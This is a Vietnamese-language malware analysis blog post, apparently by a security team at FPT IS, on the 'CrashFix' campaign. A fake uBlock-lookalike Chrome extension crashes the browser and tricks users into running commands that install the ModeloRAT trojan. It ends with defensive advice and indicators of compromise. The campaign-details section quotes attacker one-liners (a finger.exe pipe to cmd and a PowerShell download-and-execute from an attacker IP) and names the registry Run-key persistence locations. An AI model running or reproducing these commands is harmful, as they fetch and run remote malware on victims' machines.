Một tiện ích Chrome “vô hại” có thể làm sập trình duyệt và chiếm quyền máy bạn như thế nào?

Một tiện ích Chrome “vô hại” có thể làm sập trình duyệt và chiếm quyền máy bạn như thế nào?

Tổng quan

Bạn có từng nghĩ rằng điều gì sẽ xảy ra nếu một tiện ích Chrome trông hoàn toàn vô hại lại chính là khởi đầu cho một cuộc xâm nhập tinh vi hay không? Không mã độc đính kèm email, không file crack, không cảnh báo antivirus – chỉ một cú crash trình duyệt “tình cờ” và một lời đề nghị “sửa lỗi” quen thuộc.

Chiến dịch CrashFix vừa được ghi nhận vào tháng 1 năm 2026 đã cho thấy ranh giới giữa trải nghiệm người dùng và tấn công mạng đang bị xóa nhòa. Kẻ tấn công không còn khai thác lỗ hổng kỹ thuật phức tạp, mà đánh thẳng vào niềm tin cũng thói quen của người dùng: cài extension, làm theo hướng dẫn, nhấn Enter và việc còn lại để hacker lo.

Assets 3eb6f92aedf74f109c7b4b0897ec39a8 8cccb4381e6445c19f84698edfd7c743 (2) 1771347332

Theo các báo cáo được ghi nhận thì chiến dịch lần này được mang tên “KongTuke”. Trong chiến dịch này, các nhà nghiên cứu đã xác định được một số phát triển mới: một tiện ích mở rộng trình duyệt độc hại có tên NexShield mạo danh trình chặn quảng cáo uBlock Origin Lite hợp pháp, một biến thể ClickFix được gọi với cái tên “CrashFix” cố tình làm hỏng trình duyệt sau đó dụ người dùng chạy các lệnh độc hại để triển khai ModeloRAT.

Một điểm trớ trêu là nạn nhân đang tìm kiếm một trình chặn quảng cáo thì gặp phải một quảng cáo độc hại. Quảng cáo đã hướng người dùng đến Cửa hàng Chrome trực tuyến chính thức hxxps[://]chromewebstore[.]google[.]com/detail/nexshield-%E2%80%93-advanced-web/cpcdkmjddocikjdkbbeiaafnpdbdafmi, tạo ra tính hợp pháp sai lầm cho tiện ích mở rộng độc hại.

Assets 3eb6f92aedf74f109c7b4b0897ec39a8 27d6ab3f8a3047b68fb80cd661ff0612 (1) 1771347676

 

Tác động chính

  • Gây mất niềm tin vào hệ sinh thái tiện ích trình duyệt.
  • Biến người dùng thành tác nhân kích hoạt tấn công.
  • Gia tăng nguy cơ xâm nhập hệ thống doanh nghiệp.
  • Khó phát hiện và truy vết thông qua các hệ thống giám sát.
  • Đặt ra thách thức mới cho phòng thủ an ninh mạng.

CrashFix và NexShield là gì?

CrashFix

Khác với các chiến dịch phát tán mã độc truyền thống dựa vào file đính kèm hay lỗ hổng zero-day, CrashFix sẽ điều hướng người dùng bằng cách lợi dụng tâm lí của họ khi mà thông báo trình duyệt gặp lỗi, người dùng có xu hướng tìm cách “sửa nhanh”. Lợi dụng điều đó, chiến dịch này sử dụng Chrome extension giả mạo.

Điểm nguy hiểm là người dùng tự tay kích hoạt giai đoạn tấn công tiếp theo. Sau khi trình duyệt sập, tiện ích độc hại hiển thị thông báo sửa lỗi giả, hướng dẫn người dùng chạy một lệnh hệ thống và từ đó mở đường cho việc tải và cài đặt RAT (Remote Access Trojan) vào máy nạn nhân.

Assets 3eb6f92aedf74f109c7b4b0897ec39a8 Fb3b72cf61a34a818a389b9a3798567e 1771347675

CrashFix được xem là phiên bản nâng cấp của các chiến dịch ClickFix, khi kết hợp thành công:

  • Malvertising (quảng cáo độc hại).
  • Tiện ích trình duyệt giả mạo.
  • Kỹ thuật social engineering tinh vi.
  • Và payload nhắm tới cả môi trường doanh nghiệp.

NexShield

D0d5f465 F701 450b B387 Ff2574a1c7e8 1771347674

NexShield được biết đến là một tiện ích trình duyệt độc hại, nó là một mắt xích đầu tiên trong chuỗi cung ứng CrashFix. Bề ngoài, NexShield được ngụy trang như một tiện ích chặn quảng cáo và bảo vệ web, thậm chí giả mạo uBlock Origin Lite bằng cách sao chép tên gọi, mô tả và cấu trúc mã nguồn để tạo cảm giác đáng tin cậy.

Assets 3eb6f92aedf74f109c7b4b0897ec39a8 2076e4f4a4014694bcb079d2911c6413 1771347673

Sau khi được cài vào trình duyệt, NexShield không hoạt động độc hại ngay lập tức. Nó “ngủ đông” trong khoảng 60 phút để tránh bị phát hiện, rồi bắt đầu tạo ra hàng loạt kết nối và tiến trình bất thường nhằm làm cạn tài nguyên hệ thống, khiến trình duyệt bị treo hoặc crash có chủ đích.

Assets 3eb6f92aedf74f109c7b4b0897ec39a8 D31b254c863342898f3b11ae293e297b 1771347673

Chi tiết chiến dịch

Để hiểu rõ hơn về chiến dịch lần này cũng như cách thức mà người dùng vô tình bị lợi dụng bởi hacker thì chúng ta sẽ đến với từng giai đoạn một. Mỗi giai đoạn sẽ đều là bàn đạp cho các bước tiếp theo cũng như sự duy trì mã độc lâu dài trên hệ thống.

Da9e3283 757c 4df9 A4a9 67a80dc8ae2f 1771347671

Như đã đề cập trước đó thì chiến dịch này đánh vào lòng tin của người dùng khi mà nạn nhân đang tìm một extension nhằm mục đích chặn quảng cáo trên Chrome. Chính vì mục đích như vậy mà kẻ tấn công đã điều hướng nạn nhân đến trang tải NexShield trên Chrome Web Store (dù được host chính thức, nhưng nội dung độc). NexShield trông giống hệt extension uBlock Origin Lite (open-source và đáng tin), kể cả mã phần lớn là bản sao nhưng có mã độc được thêm vào.

Assets 3eb6f92aedf74f109c7b4b0897ec39a8 5cfe27395e224c38b51a54c5d3b5e0be 1771347670

Extension này sẽ gửi một UUID (ID duy nhất) tới server C2 (command-and-control) và cho phép attacker theo dõi ai đã cài, khi cập nhật hay gỡ. Một điểm nữa như đã nói thì URL C2 dùng khá tinh vi với typo nhỏ (nexsnield.com thay vì nexshield.com) để tránh bị phát hiện.

Assets 3eb6f92aedf74f109c7b4b0897ec39a8 A79d946fe7ea46dd8372e0d9b22d0781 1771347669

Assets 3eb6f92aedf74f109c7b4b0897ec39a8 55d834424a2e4e4497b5da0dbadc388b 1771347668

Sau một quãng thời gian chờ đợi khoảng 60 phút để tránh phát hiện thì NexShield bắt đầu:

  • Bơm một vòng lặp vô hạn tạo hàng tỷ kết nối nội bộ trong Chrome, gây cháy tài nguyên CPU/RAM → trình duyệt bị treo hoặc crash liên tục.
  • Mỗi 10 phút, một chu kỳ DoS mới quay lại.
  • Khi trình duyệt khởi động lại sau crash, extension hiển thị một popup giả mạo (tên “CrashFix”) nói rằng trình duyệt “đã dừng bất thường”, và yêu cầu người dùng chạy lệnh để sửa lỗi.

Assets 3eb6f92aedf74f109c7b4b0897ec39a8 2b6b31b1aad441c4a9b26ba755c7a4e5 1771347668

Assets 3eb6f92aedf74f109c7b4b0897ec39a8 5c51731d608446569bf5c199e9b9a8c5 1771347666

Popup sau khi đã cài sẽ hiển thị nội dung lỗi nhưng đấy chỉ là thông báo giả, một kĩ thuật tấn công có tên social engineering. Trong thông báo sẽ nói rằng trình duyệt của bạn bị lỗi và cần chỉnh sửa. Tại đây người dùng sẽ cần mở Run (Win + R) và paste (Ctrl + V) một đoạn lệnh Powershell độc hại từ clipboard: “edge.exe -fix-browser -hash=...“.

Be5c28fc C069 42e3 8208 68db13ca034a 1771347666

Một khi đã thực thi đoạn lệnh trên, nó dùng finger.exe (một công cụ Windows hợp pháp) như một Living-Off-The-Land Binary (LOLBin) để kết nối đến server attacker. Cúng với đó là việc tải xuống một payload tiếp theo, chạy script PowerShell trong thư mục AppData rồi xóa script đó. Điều này đã chính thức đưa mã độc vào máy của bạn.

Đương nhiên bất kể mã độc nào cũng sẽ thực hiện chống phân tích khi vào máy nạn nhân. Với NexShield cũng vậy nó sẽ khóa sử dụng DevTools như (F12, Ctrl+Shift+I/J/C), vô hiệu hóa menu chuột phải cũng như chặn hành động bôi đen, kéo thả từ người dùng.

Assets 3eb6f92aedf74f109c7b4b0897ec39a8 A90202db00434f1f9e9c7cd5dc1f2fa8 1771347665

Tại đây ModeloRAT cũng sẽ được tải xuống, một payload thực sự và nguy hiểm. Mã độc này là một Remote Access Trojan (RAT) viết bằng Python với cái tên “modes.py“.

55430868 0de6 49e5 9afa 2fc7161fdc6d 1771347664

Sau khi vào hệ thống ModeloRAT bắt đầu các quá trình thiết lập kết nối với C2 thông qua TCP với việc sử dụng finger.exe một trình hợp pháp của Windows. Trong quá trình phân tích đã ghi nhận được Command mà kẻ tấn công sử dụng:

  • cmd /c start “” /min cmd /c “copy %windir%\system32\finger.exe %temp%\ct.exe&%temp%\ct.exe [email protected][.]108|cmd”

Dd7c0510 7fd6 413d 9684 9c13cedc8d67 1771347663

Bên cạnh đó nó sẽ cho phép tải xuống DLL/executable/Python script khác, establish persistence, chạy nhiều loại payload.

  • Invoke-WebRequest -Uri “hxxp://199.217.98[.]108/b” -OutFile “$env:APPDATA\script.ps1″ & “$env:APPDATA\script.ps1″
    Remove-Item “$env:APPDATA\
    script.ps1″

Assets 3eb6f92aedf74f109c7b4b0897ec39a8 B8ff97ff52814ede8b7dafbf862e67c3 1771347662

Để tránh việc phân tích ModeloRAT cũng:

  • Kiểm tra hàng chục công cụ phân tích (ví dụ Wireshark, debugger) hoặc môi trường ảo — nếu phát hiện sandbox, nó dừng hoạt động.
  • Gửi thông tin thiết bị, danh sách antivirus đang chạy và loại hệ thống (domain vs WORKGROUP) về C2.
  • Dùng cơ chế DGA (Domain Generation Algorithm) để liên lạc với server, tránh bị chặn bằng cách thử nhiều domain khác nhau.

Assets 3eb6f92aedf74f109c7b4b0897ec39a8 E1d2cc4eeb5a492188a4b7209d7560c7 1771347661

Cơ chế duy trì

Như các chiến dịch thông thường thì mục tiêu của attacker không chỉ xâm nhập một lần, mà là:

  • Tồn tại lâu dài trên máy nạn nhân.
  • Tự khởi động lại sau reboot.
  • Khó bị người dùng hoặc IT phát hiện.
  • Trông giống hành vi/phần mềm hợp pháp.

Assets 3eb6f92aedf74f109c7b4b0897ec39a8 A6f56d4221064b0aa4864f2e523df2ed 1771347660

ModeloRAT sẽ tạo persistence bằng cách ghi vào registry:

  • HKCU\Software\Microsoft\Windows\CurrentVersion\Run
  • HKLM\Software\Microsoft\Windows\CurrentVersion\Run

Tên Key sẽ được kẻ tấn công ngụy trang giống phần mềm hợp pháp, ví dụ: Spotify47Adobe2841 hoặc ChromeUpdate. Bên cạnh đó thì ModeloRAT không đặt file ở vị trí “đáng ngờ” như Desktop hay Downloads thay vào đó chúng được đặt ở: %AppData%\Roaming\ hay %LocalAppData%\. Thư mục con có tên giống phần mềm như: update.exeservice.exe hoặc helper.exe để tránh việc phát hiện.

Kết luận

Chiến dịch CrashFix của KongTuke là một ví dụ điển hình cho xu hướng tấn công hiện đại: không cần zero-day phức tạp, mà tận dụng niềm tin của người dùng. Bằng cách ngụy trang dưới dạng một tiện ích trình duyệt quen thuộc, kẻ tấn công đã kết hợp khéo léo giữa typosquattingresource exhaustion và social engineering để ép nạn nhân tự tay kích hoạt chuỗi lây nhiễm. Điểm nguy hiểm nhất không nằm ở extension giả mạo, mà ở bước chuyển tiếp từ trình duyệt sang hệ điều hành, nơi các LOLBins hợp pháp và PowerShell bị lạm dụng để cài đặt ModeloRAT nhắm thẳng vào môi trường doanh nghiệp.

Vụ việc này nhấn mạnh rằng browser extension đã trở thành một bề mặt tấn công nghiêm trọng, đặc biệt trong bối cảnh làm việc dựa nhiều vào trình duyệt. Phòng thủ hiệu quả không thể chỉ dựa vào antivirus, mà cần kiểm soát extension bằng chính sách, giám sát hành vi bất thường (clipboard, PowerShell, LOLBins), và quan trọng nhất là nâng cao nhận thức người dùng trước các thông báo “sửa lỗi” mang tính thúc ép. CrashFix cho thấy ranh giới giữa “lỗi kỹ thuật” và “tấn công có chủ đích” ngày càng mờ và chỉ cần một lần tin nhầm, hậu quả có thể mở ra cánh cửa cho xâm nhập sâu toàn bộ hệ thống.

Khuyến nghị

  1. Cẩn trọng trước khi cài extension.
    • Chỉ cài extension từ nhà phát triển đã được xác thực, có website chính thức và lịch sử lâu dài.
    • Kiểm tra kỹ:
      • Tên extension (tránh các tên “gần giống” như NexShield vs uBlock).
      • Số lượt cài đặt (extension độc hại thường có lượt cài thấp hoặc tăng bất thường).
      • Ngày phát hành và tần suất cập nhật.
    • Tránh cài extension qua:
      • Quảng cáo (Ads)
      • Popup “đề xuất”, “fix lỗi”, “tối ưu trình duyệt”
  2. Nhận diện và xử lý cảnh báo giả (Fake Crash / ClickFix)
    • Trình duyệt thật KHÔNG BAO GIỜ yêu cầu bạn:
      • Nhấn Win + R
      • Paste lệnh từ clipboard
      • Chạy PowerShell / CMD để “sửa lỗi”
    • Nếu gặp popup:
      • Không làm theo hướng dẫn
      • Đóng trình duyệt bằng Task Manager
      • Mở lại trình duyệt ở chế độ Safe / Incognito
      • Gỡ extension vừa cài gần nhất
  3. Thói quen an toàn cho người dùng Windows
    • Không chạy lệnh PowerShell/CMD nếu bạn không hiểu rõ lệnh đó làm gì.
    • Cảnh giác khi:
      • Clipboard tự thay đổi nội dung
      • Hệ thống yêu cầu thao tác gấp (“Fix ngay”, “Lỗi nghiêm trọng”)
    • Bật hiển thị:
      • File extension (.exe.ps1.bat) để tránh nhầm lẫn.
  4. Bảo vệ máy tính và hệ điều hành
    • Luôn bật:
      • Windows Defender (Realtime Protection)
      • SmartScreen
    • Cập nhật:
      • Trình duyệt
      • Hệ điều hành
    • Sử dụng tài khoản không có quyền admin cho công việc hằng ngày.
    • Sao lưu dữ liệu định kỳ (cloud hoặc ổ cứng ngoài).

IOCs

  1. Domain C2
    • nexsnield[.]com
  2. File Hash
    • fbfce492d1aa458c0ccc8ce4611f0e2d00913c8d51b5016ce60a7f59db67de67
    • 6399c686eba09584bbbb02f31d398ace333a2b57529059849ef97ce7c27752f4
    • c15f44d6abb3a2a882ffdc9b90f7bb5d1a233c0aa183eb765aa8bfba5832c8c6
    • c46af9ae6ab0e7567573dbc950a8ffbe30ea848fac90cd15860045fe7640199c
  3. IP
    • 170.168.103[.]208
    • 158.247.252[.]178
  4. Mail

Tham khảo

  1. CrashFix Chrome Extension Delivers ModeloRAT Using ClickFix-Style Browser Crash Lures
  2. Dissecting CrashFix: KongTuke’s New Toy | Huntress
  3. GitHub – uBlockOrigin/uBOL-home: uBO Lite home (MV3)
Bài viết độc quyền của chuyên gia FPT IS 

Lưu Tuấn Anh – Trung tâm An toàn, bảo mật thông tin FPT

 

Chia sẻ:
Img Contact

Đăng ký nhận tin tức mới nhất từ FPT IS

    Tôi đồng ý chia sẻ thông tin và đồng ý với Chính sách bảo mật dữ liệu cá nhân
    Bot Avatar